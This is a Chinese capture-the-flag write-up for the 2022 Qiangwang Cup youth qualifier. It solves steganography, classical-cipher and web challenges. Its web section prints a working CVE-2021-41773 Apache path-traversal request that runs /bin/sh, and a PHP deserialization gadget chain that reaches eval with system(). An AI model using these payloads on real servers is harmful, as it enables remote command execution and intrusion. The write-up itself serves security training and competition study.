2022强网杯青少年组选拔赛WP

admin 2022年9月21日23:57:24CTF专场评论23 views5346字阅读17分49秒阅读模式

2022强网杯青少年组选拔赛WP

 

misc

misc1

你知道万能和弦是什么吗?

解压得到base64

解base64发现是2位一组倒序的png


fr = open('chuyinweilai.png','r').read()
fr = base64.b64decode(fr)
png = b''
for i in range(0,len(fr),2):
    png += fr[i:i+2][::-1]
fw = open('resa.png','wb')
fw.write(png)
fw.close()

写脚本导出PNG

2022强网杯青少年组选拔赛WP

搜索音乐的财富密码


4536251

带密码的png

cloacked-pixel


python lsb.py extract res.png 11.txt 4536251


flag{5cc0aa21208b517dbd0bde650247237f}

misc3

隐写术是一门关于信息隐藏的技巧与科学,隐写的信息看起来像一些其他的东西,隐写不同于加密,加密是一段你看不懂的东西,隐写是一段你似乎能看懂的东西。现在,这里用了一种最简单的隐写方式隐藏了一些信息,你能找到它么?

一个png

010 查看实际为jpg 文件尾一个zip和一句话


7his_1s_p4s5w0rd

zip解压得到一个png

带密码的secret.png 还是经典cloacked-pixel


python2 lsb.py extract secret.png 3.txt 7his_1s_p4s5w0rd


flag{2e55f884-ef01-4654-87b1-cc3111800085}

crypto

crypto1

没有规则的乱文,该怎么进行分析呢?

一堆A和B 有换行和空格 猜测为Morse

把B换成. A换成-


 BKJOGDTKFOEJ PV GEX OKFBGPBX FSM VGRMJ DI GXBESPZRXV IDK VXBRKX BDHHRSPBFGPDS PS GEX OKXVXSBX DI FMCXKVFKPFW QXEFCPDK, NEPBE PV MPCPMXM PSGD BWFVVPBFW BKJOGDTKFOEJ FSM HDMXKS BKJOGDTKFOEJ. GEX HFPS BWFVVPBFW BPOEXK GJOXV FKX GKFSVODVPGPDS BPOEXKV, NEPBE KXFKKFSTX GEX DKMXK DI WXGGXKV PS F HXVVFTX. FS XFKWJ VRQVGPGRGPDS BPOEXK NFV GEX BFXVFK BPOEXK, PS NEPBE XFBE WXGGXK PS GEX OWFPSGXYG NFV KXOWFBXM QJ F WXGGXK VDHX IPYXM SRHQXK DI ODVPGPDSV IRKGEXK MDNS GEX FWOEFQXG. VPSBX GEX MXCXWDOHXSG DI KDGDK BPOEXK HFBEPSXV PS NDKWM NFK P FSM GEX FMCXSG DI BDHORGXKV PS NDKWM NFK PP, BKJOGDTKFOEJ HXGEDMV EFCX QXBDHX PSBKXFVPSTWJ BDHOWXY FSM PGV FOOWPBFGPDSV HDKX CFKPXM. HDMXKS BKJOGDTKFOEJ PV EXFCPWJ QFVXM DS HFGEXHFGPBFW GEXDKJ FSM BDHORGXK VBPXSBX OKFBGPBX; BKJOGDTKFOEPB FWTDKPGEHV FKX MXVPTSXM FKDRSM BDHORGFGPDSFW EFKMSXVV FVVRHOGPDSV. GEX TKDNGE DI BKJOGDTKFOEPB GXBESDWDTJ EFV KFPVXM F SRHQXK DI WXTFW PVVRXV PS GEX PSIDKHFGPDS FTX. BKJOGDTKFOEJ'V ODGXSGPFW IDK RVX FV F GDDW IDK XVOPDSFTX FSM VXMPGPDS EFV WXM HFSJ TDCXKSHXSGV GD BWFVVPIJ PG FV F NXFODS FSM GD WPHPG DK XCXS OKDEPQPG PGV RVX FSM XYODKG. PS VDHX ARKPVMPBGPDSV NEXKX GEX RVX DI BKJOGDTKFOEJ PV WXTFW, WFNV OXKHPG PSCXVGPTFGDKV GD BDHOXW GEX MPVBWDVRKX DI XSBKJOGPDS LXJV IDK MDBRHXSGV KXWXCFSG GD FS PSCXVGPTFGPDS. BKJOGDTKFOEJ FWVD OWFJV F HFADK KDWX PS MPTPGFW KPTEGV HFSFTXHXSG FSM BDOJKPTEG PSIKPSTXHXSG MPVORGXV PS KXTFKM GD MPTPGFW HXMPF.GEX IWFT PV 1M817I23-4X20-9405-QI6M-X83M055316M6, OWXFVX FMM IWFT VGKPST FSM QKFBXV JDRKVXWI, FSM FWW WXGGXKV FKX WDNXKBFVX.

使用quipqiup对单表替换密码进行字母统计学频率分析


    CRYPTOGRAPHY IS THE PRACTICE AND STUDY OF TECHNIQUES FOR SECURE COMMUNICATION IN THE PRESENCE OF ADVERSARIAL BEHAVIOR, WHICH IS DIVIDED INTO CLASSICAL CRYPTOGRAPHY AND MODERN CRYPTOGRAPHY. THE MAIN CLASSICAL CIPHER TYPES ARE TRANSPOSITION CIPHERS, WHICH REARRANGE THE ORDER OF LETTERS IN A MESSAGE. AN EARLY SUBSTITUTION CIPHER WAS THE CAESAR CIPHER, IN WHICH EACH LETTER IN THE PLAINTEXT WAS REPLACED BY A LETTER SOME FIXED NUMBER OF POSITIONS FURTHER DOWN THE ALPHABET. SINCE THE DEVELOPMENT OF ROTOR CIPHER MACHINES IN WORLD WAR I AND THE ADVENT OF COMPUTERS IN WORLD WAR II, CRYPTOGRAPHY METHODS HAVE BECOME INCREASINGLY COMPLEX AND ITS APPLICATIONS MORE VARIED. MODERN CRYPTOGRAPHY IS HEAVILY BASED ON MATHEMATICAL THEORY AND COMPUTER SCIENCE PRACTICE; CRYPTOGRAPHIC ALGORITHMS ARE DESIGNED AROUND COMPUTATIONAL HARDNESS ASSUMPTIONS. THE GROWTH OF CRYPTOGRAPHIC TECHNOLOGY HAS RAISED A NUMBER OF LEGAL ISSUES IN THE INFORMATION AGE. CRYPTOGRAPHY'S POTENTIAL FOR USE AS A TOOL FOR ESPIONAGE AND SEDITION HAS LED MANY GOVERNMENTS TO CLASSIFY IT AS A WEAPON AND TO LIMIT OR EVEN PROHIBIT ITS USE AND EXPORT. IN SOME JURISDICTIONS WHERE THE USE OF CRYPTOGRAPHY IS LEGAL, LAWS PERMIT INVESTIGATORS TO COMPEL THE DISCLOSURE OF ENCRYPTION KEYS FOR DOCUMENTS RELEVANT TO AN INVESTIGATION. CRYPTOGRAPHY ALSO PLAYS A MAJOR ROLE IN DIGITAL RIGHTS MANAGEMENT AND COPYRIGHT INFRINGEMENT DISPUTES IN REGARD TO DIGITAL MEDIA.THE FLAG IS 1D817F23-4E20-9405-BF6D-E83D055316D6, PLEASE ADD FLAG STRING AND BRACES YOURSELF, AND ALL LETTERS ARE LOWERCASE.


THE FLAG IS 1D817F23-4E20-9405-BF6D-E83D055316D6, PLEASE ADD FLAG STRING AND BRACES YOURSELF, AND ALL LETTERS ARE LOWERCASE.
标志为 1D817F23-4E20-9405-BF6D-E83D055316D6,请自行添加标志字符串和大括号,所有字母均为小写。


flag{1d817f23-4e20-9405-bf6d-e83d055316d6}

crypto2

破解信息(最后的字符串为flag{uuid}形式)

解N形栅栏密码,32栏


FLAG[vxpsDqCElwwoClsoColwpuvlqFvvFrpopBss]

rot爆破 发现位移31和32有想要的东西


Amount = 31: ek`fz7914c2bd-880b-40b0-8167-2e77e3101a44|
Amount = 32: flag{8:25d3ce.991c.51c1.9278.3f88f4212b55}

但是把31的填到flag{}里面不对

只改-也不对,最后发现只改数字到32就对了


flag{7914d2ce-880c-40c0-8167-2f77f3101b44}

web

web1

题目内容:存在CVE-2021-41773,你能得到flag吗?

搜索CVE-2021-41773

可以知道是Apache HTTP Server漏洞

进行目录穿越然后提权shell 执行命令

2022强网杯青少年组选拔赛WP


GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: 101.200.76.17:34199
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 14
echo;cat /flag


flag{3e08776b-ae03-4c14-9955-684eb744897e}

web3


执行unserialize时会执行__destruct(),在destruct中有preg_match可以触发Range的__toString(),之后会return $this->link->horis;当$this->link是Water是对象时,就相当于返回Water类的horis方法,而这个类中没有horis属性,所以会调用__get(),其中会return $function(); 当$funtion是Circle对象时,类当方法使用会调用__invoke(),从而调用runc的eval方法


<?php
class Water{
    public $waterfall;
}
class Circle{
    public $daemon;
    public $dash;
}
class Range{
    public $horis;
    public $link;
}
class Sliver{
    public $secret;
    public $resty;
}
$a=new Sliver();
// echo unserialize($a);
$a->secret =new Range();
$a->secret->link = new Water();
$a->secret->link->waterfall = new Circle();
$a -> secret -> link -> waterfall -> dash = "system('ls');";
echo (serialize($a));
?>

拿到序列化字符串后,由于dash是protect属性,所以要在字符串中加上%00*%00,并且长度+3,最后就是绕过序列化前边的正则,在demo.php前加两个/是parse_url返回结果为false即可


flag{ab753923-7c1e-41c0-bcdb-532ddb6a0693}

比赛结果

2022强网杯青少年组选拔赛WP

2022强网杯青少年组选拔赛WP


网络安全社团公众号

微信号 : qlnu_ctf

新浪微博:齐鲁师范学院网络安全社团

2022强网杯青少年组选拔赛WP

原文始发于微信公众号(齐鲁师院网络安全社团):2022强网杯青少年组选拔赛WP

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月21日23:57:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  2022强网杯青少年组选拔赛WP http://cn-sec.com/archives/1308992.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: